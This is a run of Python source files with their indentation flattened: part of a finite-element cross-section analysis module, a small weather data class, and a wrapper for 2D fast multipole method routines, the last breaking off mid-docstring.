2 * (1 + nu) * np.transpose(N) * (ixx * Nx - ixy * Ny)) * j *
self.material.elastic_modulus
)
f_phi += (
gp[0] * (nu / 2 * np.transpose(np.transpose(B).dot(np.array([[h1], [h2]])))[0] +
2 * (1 + nu) * np.transpose(N) * (iyy * Ny - ixy * Nx)) * j *
self.material.elastic_modulus
)
return (f_psi, f_phi)
def shear_warping_integrals(self, ixx, iyy, ixy, omega):
"""Calculates the element shear centre and warping integrals required for shear analysis of
the cross-section.
:param float ixx: Second moment of area about the centroidal x-axis
:param float iyy: Second moment of area about the centroidal y-axis
:param float ixy: Second moment of area about the centroidal xy-axis
:param omega: Values of the warping function at the element nodes
:type omega: :class:`numpy.ndarray`
:return: Shear centre integrals about the x and y-axes *(sc_xint, sc_yint)*, warping
integrals *(q_omega, i_omega, i_xomega, i_yomega)*
:rtype: tuple(float, float, float, float, float, float)
"""
# initialise integrals
sc_xint = 0
sc_yint = 0
q_omega = 0
i_omega = 0
i_xomega = 0
i_yomega = 0
# Gauss points for 6 point Gaussian integration
gps = gauss_points(6)
for gp in gps:
# determine shape function, shape function derivative and jacobian
(N, B, j) = shape_function(self.coords, gp)
# determine x and y position at Gauss point
Nx = np.dot(N, np.transpose(self.coords[0, :]))
Ny = np.dot(N, np.transpose(self.coords[1, :]))
Nomega = np.dot(N, np.transpose(omega))
sc_xint += (
gp[0] * (iyy * Nx + ixy * Ny) * (Nx ** 2 + Ny ** 2) *
j * self.material.elastic_modulus
)
sc_yint += (
gp[0] * (ixx * Ny + ixy * Nx) * (Nx ** 2 + Ny ** 2) *
j * self.material.elastic_modulus
)
q_omega += gp[0] * Nomega * j * self.material.elastic_modulus
i_omega += gp[0] * Nomega ** 2 * j * self.material.elastic_modulus
i_xomega += gp[0] * Nx * Nomega * j * self.material.elastic_modulus
i_yomega += gp[0] * Ny * Nomega * j * self.material.elastic_modulus
return (sc_xint, sc_yint, q_omega, i_omega, i_xomega, i_yomega)
def shear_coefficients(self, ixx, iyy, ixy, psi_shear, phi_shear, nu):
"""Calculates the variables used to determine the shear deformation coefficients.
:param float ixx: Second moment of area about the centroidal x-axis
:param float iyy: Second moment of area about the centroidal y-axis
:param float ixy: Second moment of area about the centroidal xy-axis
:param psi_shear: Values of the psi shear function at the element nodes
:type psi_shear: :class:`numpy.ndarray`
:param phi_shear: Values of the phi shear function at the element nodes
:type phi_shear: :class:`numpy.ndarray`
:param float nu: Effective Poisson's ratio for the cross-section
:return: Shear deformation variables *(kappa_x, kappa_y, kappa_xy)*
:rtype: tuple(float, float, float)
"""
# initialise properties
kappa_x = 0
kappa_y = 0
kappa_xy = 0
# Gauss points for 6 point Gaussian integration
gps = gauss_points(6)
for gp in gps:
# determine shape function, shape function derivative and jacobian
(N, B, j) = shape_function(self.coords, gp)
# determine x and y position at Gauss point
Nx = np.dot(N, np.transpose(self.coords[0, :]))
Ny = np.dot(N, np.transpose(self.coords[1, :]))
# determine shear parameters
r = Nx ** 2 - Ny ** 2
q = 2 * Nx * Ny
d1 = ixx * r - ixy * q
d2 = ixy * r + ixx * q
h1 = -ixy * r + iyy * q
h2 = -iyy * r - ixy * q
kappa_x += (
gp[0] * (psi_shear.dot(np.transpose(B)) - nu / 2 * np.array([d1, d2])).dot(
B.dot(psi_shear) - nu / 2 * np.array([d1, d2])) * j *
self.material.elastic_modulus
)
kappa_y += (
gp[0] * (phi_shear.dot(np.transpose(B)) - nu / 2 * np.array([h1, h2])).dot(
B.dot(phi_shear) - nu / 2 * np.array([h1, h2])) * j *
self.material.elastic_modulus
)
kappa_xy += (
gp[0] * (psi_shear.dot(np.transpose(B)) - nu / 2 * np.array([d1, d2])).dot(
B.dot(phi_shear) - nu / 2 * np.array([h1, h2])) * j *
self.material.elastic_modulus
)
return (kappa_x, kappa_y, kappa_xy)
def monosymmetry_integrals(self, phi):
"""Calculates the integrals used to evaluate the monosymmetry constant about both global
axes and both prinicipal axes.
:param float phi: Principal bending axis angle
:return: Integrals used to evaluate the monosymmetry constants *(int_x, int_y, int_11,
int_22)*
:rtype: tuple(float, float, float, float)
"""
# initialise properties
int_x = 0
int_y = 0
int_11 = 0
int_22 = 0
# Gauss points for 6 point Gaussian integration
gps = gauss_points(6)
for gp in gps:
# determine shape function and jacobian
(N, _, j) = shape_function(self.coords, gp)
# determine x and y position at Gauss point
Nx = np.dot(N, np.transpose(self.coords[0, :]))
Ny = np.dot(N, np.transpose(self.coords[1, :]))
# determine 11 and 22 position at Gauss point
(Nx_11, Ny_22) = principal_coordinate(phi, Nx, Ny)
# weight the monosymmetry integrals by the section elastic modulus
int_x += gp[0] * (Nx * Nx * Ny + Ny * Ny * Ny) * j * self.material.elastic_modulus
int_y += gp[0] * (Ny * Ny * Nx + Nx * Nx * Nx) * j * self.material.elastic_modulus
int_11 += (
gp[0] * (Nx_11 * Nx_11 * Ny_22 + Ny_22 * Ny_22 * Ny_22) * j *
self.material.elastic_modulus
)
int_22 += (
gp[0] * (Ny_22 * Ny_22 * Nx_11 + Nx_11 * Nx_11 * Nx_11) * j *
self.material.elastic_modulus
)
return (int_x, int_y, int_11, int_22)
def plastic_properties(self, u, p):
"""Calculates total force resisted by the element when subjected to a stress equal to the
yield strength. Also returns the modulus weighted area and first moments of area, and
determines whether or not the element is above or below the line defined by the unit
vector *u* and point *p*.
:param u: Unit vector in the direction of the line
:type u: :class:`numpy.ndarray`
:param p: Point on the line
:type p: :class:`numpy.ndarray`
:return: Element force *(force)*, modulus weighted area properties *(ea, e.qx, e.qy)* and
whether or not the element is above the line
:rtype: tuple(float, float, float, float, bool)
"""
# initialise geometric properties
e = self.material.elastic_modulus
area = 0
qx = 0
qy = 0
force = 0
# Gauss points for 3 point Gaussian integration
gps = gauss_points(3)
# loop through each Gauss point
for gp in gps:
# determine shape function, shape function derivative and jacobian
(N, _, j) = shape_function(self.coords, gp)
area += gp[0] * j
qx += gp[0] * np.dot(N, np.transpose(self.coords[1, :])) * j
qy += gp[0] * np.dot(N, np.transpose(self.coords[0, :])) * j
force += gp[0] * j * self.material.yield_strength
# calculate element centroid
(cx, cy) = (qy / area, qx / area)
# determine if the element is above the line p + u
is_above = point_above_line(u, p[0], p[1], cx, cy)
return (force, area * e, qx * e, qy * e, is_above)
def element_stress(self, N, Mxx, Myy, M11, M22, Mzz, Vx, Vy, ea, cx, cy, ixx, iyy, ixy, i11,
i22, phi, j, nu, omega, psi_shear, phi_shear, Delta_s):
"""Calculates the stress within an element resulting from a specified loading. Also returns
the shape function weights.
:param float N: Axial force
:param float Mxx: Bending moment about the centroidal xx-axis
:param float Myy: Bending moment about the centroidal yy-axis
:param float M11: Bending moment about the centroidal 11-axis
:param float M22: Bending moment about the centroidal 22-axis
:param float Mzz: Torsion moment about the centroidal zz-axis
:param float Vx: Shear force acting in the x-direction
:param float Vy: Shear force acting in the y-direction
:param float ea: Modulus weighted area
:param float cx: x position of the elastic centroid
:param float cy: y position of the elastic centroid
:param float ixx: Second moment of area about the centroidal x-axis
:param float iyy: Second moment of area about the centroidal y-axis
:param float ixy: Second moment of area about the centroidal xy-axis
:param float i11: Second moment of area about the principal 11-axis
:param float i22: Second moment of area about the principal 22-axis
:param float phi: Principal bending axis angle
:param float j: St. Venant torsion constant
:param float nu: Effective Poisson's ratio for the cross-section
:param omega: Values of the warping function at the element nodes
:type omega: :class:`numpy.ndarray`
:param psi_shear: Values of the psi shear function at the element nodes
:type psi_shear: :class:`numpy.ndarray`
:param phi_shear: Values of the phi shear function at the element nodes
:type phi_shear: :class:`numpy.ndarray`
:param float Delta_s: Cross-section shear factor
:return: Tuple containing element stresses and integration weights
(:math:`\sigma_{zz,n}`, :math:`\sigma_{zz,mxx}`,
:math:`\sigma_{zz,myy}`, :math:`\sigma_{zz,m11}`,
:math:`\sigma_{zz,m22}`, :math:`\sigma_{zx,mzz}`,
:math:`\sigma_{zy,mzz}`, :math:`\sigma_{zx,vx}`,
:math:`\sigma_{zy,vx}`, :math:`\sigma_{zx,vy}`,
:math:`\sigma_{zy,vy}`, :math:`w_i`)
:rtype: tuple(:class:`numpy.ndarray`, :class:`numpy.ndarray`, ...)
"""
# calculate axial stress
sig_zz_n = N * np.ones(6) * self.material.elastic_modulus / ea
# initialise stresses at the gauss points
sig_zz_mxx_gp = np.zeros((6, 1))
sig_zz_myy_gp = np.zeros((6, 1))
sig_zz_m11_gp = np.zeros((6, 1))
sig_zz_m22_gp = np.zeros((6, 1))
sig_zxy_mzz_gp = np.zeros((6, 2))
sig_zxy_vx_gp = np.zeros((6, 2))
sig_zxy_vy_gp = np.zeros((6, 2))
# Gauss points for 6 point Gaussian integration
gps = gauss_points(6)
for (i, gp) in enumerate(gps):
# determine x and y positions with respect to the centroidal axis
coords_c = np.zeros((2, 6))
coords_c[0, :] = self.coords[0, :] - cx
coords_c[1, :] = self.coords[1, :] - cy
# determine shape function, shape function derivative and jacobian
(N, B, _) = shape_function(coords_c, gp)
# determine x and y position at Gauss point
Nx = np.dot(N, np.transpose(coords_c[0, :]))
Ny = np.dot(N, np.transpose(coords_c[1, :]))
# determine 11 and 22 position at Gauss point
(Nx_11, Ny_22) = principal_coordinate(phi, Nx, Ny)
# determine shear parameters
r = Nx ** 2 - Ny ** 2
q = 2 * Nx * Ny
d1 = ixx * r - ixy * q
d2 = ixy * r + ixx * q
h1 = -ixy * r + iyy * q
h2 = -iyy * r - ixy * q
# calculate element stresses
sig_zz_mxx_gp[i, :] = (
self.material.elastic_modulus * (-(ixy * Mxx) / (ixx * iyy - ixy ** 2) * Nx + (
iyy * Mxx) / (ixx * iyy - ixy ** 2) * Ny)
)
sig_zz_myy_gp[i, :] = (
self.material.elastic_modulus * (-(ixx * Myy) / (ixx * iyy - ixy ** 2) * Nx + (
ixy * Myy) / (ixx * iyy - ixy ** 2) * Ny)
)
sig_zz_m11_gp[i, :] = self.material.elastic_modulus * M11 / i11 * Ny_22
sig_zz_m22_gp[i, :] = self.material.elastic_modulus * -M22 / i22 * Nx_11
if Mzz != 0:
sig_zxy_mzz_gp[i, :] = (
self.material.elastic_modulus * Mzz / j * (B.dot(omega) - np.array([Ny, -Nx]))
)
if Vx != 0:
sig_zxy_vx_gp[i, :] = (
self.material.elastic_modulus * Vx / Delta_s * (
B.dot(psi_shear) - nu / 2 * np.array([d1, d2]))
)
if Vy != 0:
sig_zxy_vy_gp[i, :] = (
self.material.elastic_modulus * Vy / Delta_s * (
B.dot(phi_shear) - nu / 2 * np.array([h1, h2]))
)
# extrapolate results to nodes
sig_zz_mxx = extrapolate_to_nodes(sig_zz_mxx_gp[:, 0])
sig_zz_myy = extrapolate_to_nodes(sig_zz_myy_gp[:, 0])
sig_zz_m11 = extrapolate_to_nodes(sig_zz_m11_gp[:, 0])
sig_zz_m22 = extrapolate_to_nodes(sig_zz_m22_gp[:, 0])
sig_zx_mzz = extrapolate_to_nodes(sig_zxy_mzz_gp[:, 0])
sig_zy_mzz = extrapolate_to_nodes(sig_zxy_mzz_gp[:, 1])
sig_zx_vx = extrapolate_to_nodes(sig_zxy_vx_gp[:, 0])
sig_zy_vx = extrapolate_to_nodes(sig_zxy_vx_gp[:, 1])
sig_zx_vy = extrapolate_to_nodes(sig_zxy_vy_gp[:, 0])
sig_zy_vy = extrapolate_to_nodes(sig_zxy_vy_gp[:, 1])
return (sig_zz_n, sig_zz_mxx, sig_zz_myy, sig_zz_m11, sig_zz_m22, sig_zx_mzz, sig_zy_mzz,
sig_zx_vx, sig_zy_vx, sig_zx_vy, sig_zy_vy, gps[:, 0])
def point_within_element(self, pt):
"""Determines whether a point lies within the current element.
:param pt: Point to check *(x, y)*
:type pt: list[float, float]
:return: Whether the point lies within an element
:rtype: bool
"""
px = pt[0]
py = pt[1]
# get coordinates of corner points
x1 = self.coords[0][0]
y1 = self.coords[1][0]
x2 = self.coords[0][1]
y2 = self.coords[1][1]
x3 = self.coords[0][2]
y3 = self.coords[1][2]
# compute variables alpha, beta and gamma
alpha = (
((y2 - y3) * (px - x3) + (x3 - x2) * (py - y3)) /
((y2 - y3) * (x1 - x3) + (x3 - x2) * (y1 - y3))
)
beta = (
((y3 - y1) * (px - x3) + (x1 - x3) * (py - y3)) /
((y2 - y3) * (x1 - x3) + (x3 - x2) * (y1 - y3))
)
gamma = 1.0 - alpha - beta
# if the point lies within an element
if alpha >= 0 and beta >= 0 and gamma >= 0:
return True
else:
return False
def gauss_points(n):
"""Returns the Gaussian weights and locations for *n* point Gaussian integration of a quadratic
triangular element.
:param int n: Number of Gauss points (1, 3 or 6)
:return: An *n x 4* matrix consisting of the integration weight and the eta, xi and zeta
locations for *n* Gauss points
:rtype: :class:`numpy.ndarray`
"""
if n == 1:
# one point gaussian integration
return np.array([[1, 1.0 / 3, 1.0 / 3, 1.0 / 3]])
elif n == 3:
# three point gaussian integration
return np.array([
[1.0 / 3, 2.0 / 3, 1.0 / 6, 1.0 / 6],
[1.0 / 3, 1.0 / 6, 2.0 / 3, 1.0 / 6],
[1.0 / 3, 1.0 / 6, 1.0 / 6, 2.0 / 3]
])
elif n == 6:
# six point gaussian integration
g1 = 1.0 / 18 * (8 - np.sqrt(10) + np.sqrt(38 - 44 * np.sqrt(2.0 / 5)))
g2 = 1.0 / 18 * (8 - np.sqrt(10) - np.sqrt(38 - 44 * np.sqrt(2.0 / 5)))
w1 = (620 + np.sqrt(213125 - 53320 * np.sqrt(10))) / 3720
w2 = (620 - np.sqrt(213125 - 53320 * np.sqrt(10))) / 3720
return np.array([
[w2, 1 - 2 * g2, g2, g2],
[w2, g2, 1 - 2 * g2, g2],
[w2, g2, g2, 1 - 2 * g2],
[w1, g1, g1, 1 - 2 * g1],
[w1, 1 - 2 * g1, g1, g1],
[w1, g1, 1 - 2 * g1, g1]
])
def shape_function(coords, gauss_point):
"""Computes shape functions, shape function derivatives and the determinant of the Jacobian
matrix for a tri 6 element at a given Gauss point.
:param coords: Global coordinates of the quadratic triangle vertices [2 x 6]
:type coords: :class:`numpy.ndarray`
:param gauss_point: Gaussian weight and isoparametric location of the Gauss point
:type gauss_point: :class:`numpy.ndarray`
:return: The value of the shape functions *N(i)* at the given Gauss point [1 x 6], the
derivative of the shape functions in the j-th global direction *B(i,j)* [2 x 6] and the
determinant of the Jacobian matrix *j*
:rtype: tuple(:class:`numpy.ndarray`, :class:`numpy.ndarray`, float)
"""
# location of isoparametric co-ordinates for each Gauss point
eta = gauss_point[1]
xi = gauss_point[2]
zeta = gauss_point[3]
# value of the shape functions
N = np.array([
eta * (2 * eta - 1),
xi * (2 * xi - 1),
zeta * (2 * zeta - 1),
4 * eta * xi,
4 * xi * zeta,
4 * eta * zeta
])
# derivatives of the shape functions wrt the isoparametric co-ordinates
B_iso = np.array([
[4 * eta - 1, 0, 0, 4 * xi, 0, 4 * zeta],
[0, 4 * xi - 1, 0, 4 * eta, 4 * zeta, 0],
[0, 0, 4 * zeta - 1, 0, 4 * xi, 4 * eta]
])
# form Jacobian matrix
J_upper = np.array([[1, 1, 1]])
J_lower = np.dot(coords, np.transpose(B_iso))
J = np.vstack((J_upper, J_lower))
# calculate the jacobian
j = 0.5 * np.linalg.det(J)
# if the area of the element is not zero
if j != 0:
# cacluate the P matrix
P = np.dot(np.linalg.inv(J), np.array([[0, 0], [1, 0], [0, 1]]))
# calculate the B matrix in terms of cartesian co-ordinates
B = np.transpose(np.dot(np.transpose(B_iso), P))
else:
B = np.zeros((2, 6)) # empty B matrix
return (N, B, j)
def extrapolate_to_nodes(w):
"""Extrapolates results at six Gauss points to the six noes of a quadratic triangular element.
:param w: Result at the six Gauss points [1 x 6]
:type w: :class:`numpy.ndarray`
:return: Extrapolated nodal values at the six nodes [1 x 6]
:rtype: :class:`numpy.ndarray`
"""
H_inv = np.array([
[1.87365927351160, 0.138559587411935, 0.138559587411935,
-0.638559587411936, 0.126340726488397, -0.638559587411935],
[0.138559587411935, 1.87365927351160, 0.138559587411935,
-0.638559587411935, -0.638559587411935, 0.126340726488397],
[0.138559587411935, 0.138559587411935, 1.87365927351160,
0.126340726488396, -0.638559587411935, -0.638559587411935],
[0.0749010751157440, 0.0749010751157440, 0.180053080734478,
1.36051633430762, -0.345185782636792, -0.345185782636792],
[0.180053080734478, 0.0749010751157440, 0.0749010751157440,
-0.345185782636792, 1.36051633430762, -0.345185782636792],
[0.0749010751157440, 0.180053080734478, 0.0749010751157440,
-0.345185782636792, -0.345185782636792, 1.36051633430762]
])
return H_inv.dot(w)
def principal_coordinate(phi, x, y):
"""Determines the coordinates of the cartesian point *(x, y)* in the
principal axis system given an axis rotation angle phi.
:param float phi: Prinicpal bending axis angle (degrees)
:param float x: x coordinate in the global axis
:param float y: y coordinate in the global axis
:return: Principal axis coordinates *(x1, y2)*
:rtype: tuple(float, float)
"""
# convert principal axis angle to radians
phi_rad = phi * np.pi / 180
# form rotation matrix
R = np.array([
[np.cos(phi_rad), np.sin(phi_rad)],
[-np.sin(phi_rad), np.cos(phi_rad)]
])
# calculate rotated x and y coordinates
x_rotated = R.dot(np.array([x, y]))
return (x_rotated[0], x_rotated[1])
def global_coordinate(phi, x11, y22):
"""Determines the global coordinates of the principal axis point *(x1, y2)* given principal
axis rotation angle phi.
:param float phi: Prinicpal bending axis angle (degrees)
:param float x11: 11 coordinate in the principal axis
:param float y22: 22 coordinate in the principal axis
:return: Global axis coordinates *(x, y)*
:rtype: tuple(float, float)
"""
# convert principal axis angle to radians
phi_rad = phi * np.pi / 180
# form transposed rotation matrix
R = np.array([
[np.cos(phi_rad), -np.sin(phi_rad)],
[np.sin(phi_rad), np.cos(phi_rad)]
])
# calculate rotated x_1 and y_2 coordinates
x_rotated = R.dot(np.array([x11, y22]))
return (x_rotated[0], x_rotated[1])
def point_above_line(u, px, py, x, y):
"""Determines whether a point *(x, y)* is a above or below the line defined by the parallel
unit vector *u* and the point *(px, py)*.
:param u: Unit vector parallel to the line [1 x 2]
:type u: :class:`numpy.ndarray`
:param float px: x coordinate of a point on the line
:param float py: y coordinate of a point on the line
:param float x: x coordinate of the point to be tested
:param float y: y coordinate of the point to be tested
:return: This method returns *True* if the point is above the line or *False* if the point is
below the line
:rtype: bool
"""
# vector from point to point on line
PQ = np.array([px - x, py - y])
return np.cross(PQ, u) > 0
|
class Hourly:
def __init__(self, temp, feels_like, pressure, humidity, wind_speed, date, city, weather):
self.temp=temp;
self.feels_like=feels_like;
self.pressure=pressure;
self.humidity=humidity;
self.wind_speed=wind_speed;
self.date=date;
self.city=city;
self.weather=weather;
|
import numpy as np
from fmmlib2d import hfmm2dparttarg
from fmmlib2d import lfmm2dparttarg
from fmmlib2d import rfmm2dparttarg
from fmmlib2d import zfmm2dparttarg
from fmmlib2d import cfmm2dparttarg
from fmmlib2d import h2dpartdirect
from fmmlib2d import l2dpartdirect
from fmmlib2d import r2dpartdirect
from fmmlib2d import z2dpartdirect
from fmmlib2d import c2dpartdirect
from stokesfmm import bhfmm2dparttarg
def initialize_precision(iprec):
if iprec < -2:
iprec = -2
if iprec > 5:
iprec = 5
return int(iprec)
def get_dummy_shape(shape):
if len(shape) == 1:
return (1,)
else:
return (shape[0], 1)
def check_array(arr, shape, mytype, name, return_2dim=False):
"""
Function to make sure an array is acceptable
If arr is None:
returns dummy array, int(0)
Else:
Throws error if:
not a numpy array
shape is not correct
note: if shape is (k,None), won't check one second dim size
type is not as specified
will cast float to complex without an error
will NOT cast complex to float
Reallocates if:
not Fortran contiguous
Note: name is just to help throw useful errors to the user
Returns:
original array or reallocated array, int(1)
If return_2dim, also returns the second dim size
"""
if arr is None:
sh = get_dummy_shape(shape)
arr = np.empty(sh, order='F', dtype=mytype)
here = int(0)
else:
if type(arr) != np.ndarray:
raise Exception(name + ' must be numpy array')
sh = arr.shape
if len(sh) != len(shape) or sh[0] != shape[0]:
raise Exception(name + 'does not have correct shape.')
if len(sh) > 1 and shape[1] != None and sh[1] != shape[1]:
raise Exception(name + 'does not have correct shape.')
if arr.dtype != mytype:
if not (arr.dtype == float and mytype == complex):
raise Exception(name + ' must have type ' + str(mytype))
arr = arr.astype(mytype, order='F', copy=False)
here = int(1)
if return_2dim:
return arr, here, sh[1]
else:
return arr, here
def check_output(arr, used, shape, mytype):
"""
Function to check on output array
If used is False:
returns dummy array, int(0)
If used is True:
If arr:
has the right shape
has the right type
is Fortran contiguous
returns arr, int(1)
Else:
allocates a new array with the right shape, type, contiguity
returns the new array, int(1)
"""
if used:
if arr is not None:
test1 = arr.shape == shape
test2 = arr.dtype == mytype
test3 = arr.flags['F_CONTIGUOUS']
if not (test1 and test2 and test3):
arr = None
if arr is None:
arr = np.empty(shape, order='F', dtype=mytype)
else:
arr = arr.astype(mytype, order='F', copy=False)
else:
arr = np.empty(get_dummy_shape(shape), order='F', dtype=mytype)
return arr, int(used)
def get_fmmlib2d_output(csp,csg,csh,sp,sg,sh,ctp,ctg,cth,tp,tg,th,ier):
output = {}
any_source = csp or csg or csh
if any_source:
source_output = {}
if csp:
source_output['Pu'] = sp
source_output['u'] = sp[0]
if csg:
source_output['Du'] = sg
source_output['u_x'] = sg[0]
source_output['u_y'] = sg[1]
if csh:
source_output['Hu'] = sh
source_output['u_xx'] = sh[0]
source_output['u_xy'] = sh[1]
source_output['u_yx'] = sh[1]
source_output['u_yy'] = sh[2]
output['source'] = source_output
any_target = ctp or ctg or cth
if any_target:
target_output = {}
if ctp:
target_output['Pu'] = tp
target_output['u'] = tp[0]
if ctg:
target_output['Du'] = tg
target_output['u_x'] = tg[0]
target_output['u_y'] = tg[1]
if cth:
target_output['Hu'] = th
target_output['u_xx'] = th[0]
target_output['u_xy'] = th[1]
target_output['u_yx'] = th[1]
target_output['u_yy'] = th[2]
output['target'] = target_output
output['ier'] = ier
return output
def get_fmmlib2d_output_cauchy(csp,csg,csh,sp,sg,sh,ctp,ctg,cth,tp,tg,th,ier):
output = {}
any_source = csp or csg or csh
if any_source:
source_output = {}
if csp:
source_output['u'] = sp
if csg:
source_output['Du'] = sg
if csh:
source_output['Hu'] = sh
output['source'] = source_output
any_target = ctp or ctg or cth
if any_target:
target_output = {}
if ctp:
target_output['u'] = tp
if ctg:
target_output['Du'] = tg
if cth:
target_output['Hu'] = th
output['target'] = target_output
output['ier'] = ier
return output
def FMM(kind, **kwargs):
"""
Pythonic interface to Particle FMM Routines for:
Helmholtz, Laplace, Cauchy, Biharmonic, and Stokes
This function calls the following functions:
HFMM: (kind='helmholtz')
LFMM: (kind='laplace-complex')
RFMM: (kind='laplace-real' or 'laplace')
ZFMM: (kind='cauchy')
CFMM: (kind='cauchy-general')
BFMM: (kind='biharmonic')
SFMM: (kind='stokes')
Please see help files for individual functions for more details.
Details on the 'precision' parameter (this is the same across all functions):
precision (optional), int: precision requested of FMM
-2: least squares errors < 0.5e+00
-1: least squares errors < 0.5e-01
0: least squares errors < 0.5e-02
1: least squares errors < 0.5e-03
2: least squares errors < 0.5e-06
3: least squares errors < 0.5e-09
4: least squares errors < 0.5e-12
5: least squares errors < 0.5e-15
note that this is ignored if direct=True
and defaults to 4 for all routines
"""
return function_map[kind](**kwargs)
def HFMM(
source,
target = None,
charge = None,
dipstr = None,
dipvec = None,
direct = False,
compute_source_potential = False,
compute_source_gradient = False,
compute_source_hessian = False,
compute_target_potential = False,
compute_target_gradient = False,
compute_target_hessian = False,
array_source_potential = None,
array_source_gradient = None,
array_source_hessian = None,
array_target_potential = None,
array_target_gradient = None,
array_target_hessian = None,
precision = 4,
helmholtz_parameter = 1.0,
):
"""
Pythonic interface for Helmholtz Particle FMM
Wraps the two functions:
hfmm2dparttarg - (if direct=False)
h2dpartdirect - (if direct=True)
Parameters:
source (required), float(2, ns): location of sources
target (optional), float(2, nt): location of targets
charge (optional), complex(ns): charges at source locations
dipstr (optional), complex(ns): dipole at source locations
dipvec (optional), float(2, ns): orientation vector of dipoles
if dipstr is set, then dipvec must be, also
direct (optional), bool: do direct sum or FMM
compute_#_* (optional), bool: whether to compute * at # locations
array_#_* (optional), complex(k,n): preallocated arrays for result
k = 1 for *=potential, 2 for *=gradient, 3 for *=hessian
n = ns for #=source, nt for #=target
if these arrays are not provided, are not of the correct size, not
of the correct type, or not fortran contiguous, new arrays for
the results will be allocated at runtime
precision (optional), float: precision, see documentation for FMM
helmholtz_parameter (optional), complex: complex helmholtz parameter
Returns:
Dictionary:
'ier': (integer) output code
0: successful completion of code
4: failure to allocate memory for tree
8: failure to allocate memory for FMM workspaces
16: failure to allocate memory for multipole/local
expansions
'source': (quantities computed at source locations)
'Pu' : complex(1,ns), potential
'u' : complex(ns), potential
'u_x' : complex(ns), x-derivative of potential
'u_y' : complex(ns), y-derivative of potential
'Du' : complex(2,ns), gradient of potential
'u_xx' : complex(ns), xx-derivative of potential
'u_xy' : complex(ns), xy-derivative of potential
'u_yx' : complex(ns), yx-derivative of potential
'u_yy' : complex(ns), xy-derivative of potential
'Hu' : complex(3,ns), hessian of potential
'target': (quantities computed at target locations):
same as above, but for target related things
ns replaced by nt, in the shapes
Some notes about the output:
1) 'u', 'u_x', 'u_y', 'u_xx', 'u_xy', 'u_yx', and 'u_yy' are
not duplications; they are simply views
into the arrays 'Pu', Du' and 'Hu', organized as follows:
Pu[0] = u
Du[0] = u_x
Du[1] = u_y
Hu[0] = u_xx
Hu[1] = u_xy
Hu[1] = u_yx
Hu[2] = u_yy
2) If array_#_* is provided and was acceptable, the code:
"array_#_* is output['#']['**']"
will return True (note ** is Pu for *=potential,
Du for *=gradient, Hu for *=Hessian)
If the array was provided but incorrect, then the code
will return False
3) Entries of the dictionary will only exist if they were asked for
i.e. if no 'source' quantities were requested, the 'source'
dictionary will not exist
"""
source, _, ns = check_array(source, (2,None), float, 'source', True)
charge, ifcharge = check_array(charge, (ns,), complex, 'charge')
dipstr, ifdipstr = check_array(dipstr, (ns,), complex, 'dipstr')
dipvec, ifdipvec = check_array(dipvec, (2,ns), float, 'dipvec')
if ifdipstr and not ifdipvec:
raise Exception('If dipstr is provided, dipvec must be also')
pot, ifpot = check_output(array_source_potential,
compute_source_potential, (1,ns), complex)
grad, ifgrad = check_output(array_source_gradient,
compute_source_gradient, (2,ns), complex)
hess, ifhess = check_output(array_source_hessian,
compute_source_hessian, (3,ns), complex)
target, iftarget, nt = check_array(target, (2,None), float, 'target', True)
if not iftarget:
if compute_target_potential or compute_target_gradient \
or compute_target_hessian:
raise Exception('If asking for a target quanitity, \
target must be given')
pottarg, ifpottarg = check_output(array_target_potential,
compute_target_potential, (1,nt), complex)
gradtarg, ifgradtarg = check_output(array_target_gradient,
compute_target_gradient, (2,nt), complex)
hesstarg, ifhesstarg = check_output(array_target_hessian,
compute_target_hessian, (3,nt), complex)
ier = int(0)
iprec = initialize_precision(precision)
zk = complex(helmholtz_parameter)
if direct:
h2dpartdirect(zk, ns, source, ifcharge, charge, ifdipstr, dipstr,
dipvec, ifpot, pot, ifgrad, grad, ifhess, hess, nt, target,
ifpottarg, pottarg, ifgradtarg, gradtarg, ifhesstarg, hesstarg)
else:
hfmm2dparttarg(ier, iprec, zk, ns, source, ifcharge, charge,
ifdipstr, dipstr, dipvec, ifpot, pot, ifgrad, grad, ifhess,
hess, nt, target, ifpottarg, pottarg, ifgradtarg, gradtarg,
ifhesstarg, hesstarg)
out = get_fmmlib2d_output(
compute_source_potential,
compute_source_gradient,
compute_source_hessian,
pot, grad, hess,
compute_target_potential,
compute_target_gradient,
compute_target_hessian,
pottarg, gradtarg, hesstarg,
ier
)
return out
def LFMM(
source,
target = None,
charge = None,
dipstr = None,
dipvec = None,
direct = False,
compute_source_potential = False,
compute_source_gradient = False,
compute_source_hessian = False,
compute_target_potential = False,
compute_target_gradient = False,
compute_target_hessian = False,
array_source_potential = None,
array_source_gradient = None,
array_source_hessian = None,
array_target_potential = None,
array_target_gradient = None,
array_target_hessian = None,
precision = 4,
):
"""
Pythonic interface for Laplace Particle FMM (complex densities)
Wraps the two functions:
lfmm2dparttarg - (if direct=False)
l2dpartdirect - (if direct=True)
Parameters:
source (required), float(2, ns): location of sources
target (optional), float(2, nt): location of targets
charge (optional), complex(ns): charges at source locations
dipstr (optional), complex(ns): dipole at source locations
dipvec (optional), float(2, ns): orientation vector of dipoles
if dipstr is set, then dipvec must be, also
direct (optional), bool: do direct sum or FMM
compute_#_* (optional), bool: whether to compute * at # locations
array_#_* (optional), complex(k,n): preallocated arrays for result
k = 1 for *=potential, 2 for *=gradient, 3 for *=hessian
n = ns for #=source, nt for #=target
if these arrays are not provided, are not of the correct size, not
of the correct type, or not fortran contiguous, new arrays for
the results will be allocated at runtime
precision (optional), float: precision, see documentation for FMM
Returns:
Dictionary:
'ier': (integer) output code
0: successful completion of code
4: failure to allocate memory for tree
8: failure to allocate memory for FMM workspaces
16: failure to allocate memory for multipole/local
expansions
'source': (quantities computed at source locations)
'Pu' : complex(1,ns), potential
'u' : complex(ns), potential
'u_x' : complex(ns), x-derivative of potential
'u_y' : complex(ns), y-derivative of potential
'Du' : complex(2,ns), gradient of potential
'u_xx' : complex(ns), xx-derivative of potential
'u_xy' : complex(ns), xy-derivative of potential
'u_yx' : complex(ns), yx-derivative of potential
'u_yy' : complex(ns), xy-derivative of potential
'Hu' : complex(3,ns), hessian of potential
'target': (quantities computed at target locations):
same as above, but for target related things
ns replaced by nt, in the shapes
Some notes about the output:
1) 'u', 'u_x', 'u_y', 'u_xx', 'u_xy', 'u_yx', and 'u_yy' are
not duplications; they are simply views
into the arrays 'Pu', Du' and 'Hu', organized as follows:
Pu[0] = u
Du[0] = u_x
Du[1] = u_y
Hu[0] = u_xx
Hu[1] = u_xy
Hu[1] = u_yx
Hu[2] = u_yy
2) If array_#_* is provided and was acceptable, the code:
"array_#_* is output['#']['**']"
will return True (note ** is Pu for *=potential,
Du for *=gradient, Hu for *=Hessian)
